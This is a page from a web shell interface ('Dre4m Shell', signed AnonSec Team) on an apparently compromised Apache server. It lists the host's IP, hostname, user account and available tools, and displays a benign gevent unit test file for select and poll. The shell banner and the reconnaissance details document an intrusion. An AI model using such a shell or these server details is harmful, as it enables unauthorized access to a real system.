Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.188.69.167
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /srv/modoboa/env/lib64/python3.5/site-packages/gevent/tests//test__select.py
from gevent.testing import six
import sys
import os
import errno
from gevent import select, socket
import gevent.core
import gevent.testing as greentest
import gevent.testing.timing
import unittest


class TestSelect(gevent.testing.timing.AbstractGenericWaitTestCase):
    """Calls ``select.select`` with three empty descriptor lists.

    NOTE(review): the base class presumably measures how long ``wait``
    takes against the requested timeout -- confirm in
    gevent.testing.timing.
    """

    def wait(self, timeout):
        """Call ``select.select`` with no descriptors and the given timeout."""
        # No descriptors are supplied in any of the three lists, so only
        # the timeout argument varies between calls.
        select_args = ([], [], [], timeout)
        select.select(*select_args)



@greentest.skipOnWindows("Cant select on files")
class TestSelectRead(gevent.testing.timing.AbstractGenericWaitTestCase):
    """``select.select`` checks against real descriptors: a pipe and a file."""

    def wait(self, timeout):
        """Select for readability on the read end of a freshly created pipe.

        Nothing is written to the pipe here; both ends are closed
        afterwards no matter how the select call finishes.
        """
        read_end, write_end = os.pipe()
        try:
            readers = [read_end]
            select.select(readers, [], [], timeout)
        finally:
            os.close(read_end)
            os.close(write_end)

    # Issue #12367: http://www.freebsd.org/cgi/query-pr.cgi?pr=kern/155606
    @unittest.skipIf(sys.platform.startswith('freebsd'),
                     'skip because of a FreeBSD bug: kern/155606')
    def test_errno(self):
        # Backported from test_select.py in 3.4
        #
        # Selecting on a descriptor that has already been closed must
        # raise an error carrying EBADF.
        with open(__file__, 'rb') as source_file:
            closed_fd = source_file.fileno()
            # Close explicitly so the number we hold is stale before select
            # sees it; the ``with`` exit then has nothing left to do.
            source_file.close()
            try:
                select.select([closed_fd], [], [], 0)
            except OSError as exc:
                # Python 3
                self.assertEqual(exc.errno, errno.EBADF)
            except select.error as exc: # pylint:disable=duplicate-except
                # Python 2 (select.error is OSError on py3)
                self.assertEqual(exc.args[0], errno.EBADF)
            else:
                self.fail("exception not raised")


@unittest.skipUnless(hasattr(select, 'poll'), "Needs poll")
@greentest.skipOnWindows("Cant poll on files")
class TestPollRead(gevent.testing.timing.AbstractGenericWaitTestCase):
    """``select.poll`` checks against real descriptors: a pipe and a file."""

    def wait(self, timeout):
        """Poll the read end of a fresh pipe for read events only.

        ``timeout`` is in seconds and is scaled by 1000 because ``poll()``
        takes milliseconds. The pipe is always closed on the way out.
        """
        # On darwin, the read pipe is reported as writable
        # immediately, for some reason. So we carefully register
        # it only for read events (the default is read and write)
        r, w = os.pipe()
        try:
            poll = select.poll()
            poll.register(r, select.POLLIN)
            # Only unregister once registration has actually succeeded;
            # otherwise unregister would raise KeyError and hide the
            # original failure.
            try:
                poll.poll(timeout * 1000)
            finally:
                poll.unregister(r)
        finally:
            # Outer finally: the descriptors are released even when
            # creating the poll object, registering, or unregistering fails.
            os.close(r)
            os.close(w)

    def test_unregister_never_registered(self):
        # "Attempting to remove a file descriptor that was
        # never registered causes a KeyError exception to be
        # raised."
        poll = select.poll()
        self.assertRaises(KeyError, poll.unregister, 5)

    @unittest.skipIf(hasattr(gevent.core, 'libuv'),
                     "Depending on whether the fileno is reused or not this either crashes or does nothing."
                     "libuv won't open a watcher for a closed file on linux.")
    def test_poll_invalid(self):
        # A descriptor that is closed after being registered must be
        # reported back by poll() with POLLNVAL.
        with open(__file__, 'rb') as fp:
            fd = fp.fileno()

            poll = select.poll()
            poll.register(fd, select.POLLIN)
            # Close after registering; libuv refuses to even
            # create a watcher if it would get EBADF (so this turns into
            # a test of whether or not we successfully initted the watcher).
            fp.close()
            result = poll.poll(0)
            self.assertEqual(result, [(fd, select.POLLNVAL)]) # pylint:disable=no-member

class TestSelectTypes(greentest.TestCase):
    """Checks which Python types ``select.select`` accepts as descriptors."""

    def test_int(self):
        # A plain ``int`` descriptor is accepted.
        probe = socket.socket()
        try:
            int_fd = int(probe.fileno())
            select.select([int_fd], [], [], 0.001)
        finally:
            probe.close()

    # Only defined where ``six.builtins`` exposes a ``long`` type.
    if hasattr(six.builtins, 'long'):
        def test_long(self):
            # A ``long`` descriptor is accepted as well.
            probe = socket.socket()
            try:
                long_fd = six.builtins.long(probe.fileno())
                select.select([long_fd], [], [], 0.001)
            finally:
                probe.close()

    def test_string(self):
        # NOTE(review): presumably tells the greentest harness not to
        # expect a greenlet switch during this test -- confirm against
        # greentest.TestCase.
        self.switch_expected = False
        # A string is not a usable descriptor and must be rejected.
        with self.assertRaises(TypeError):
            select.select(['hello'], [], [], 0.001)


# When executed directly as a script, hand control to greentest.main().
if __name__ == '__main__':
    greentest.main()

Anon7 - 2022
AnonSec Team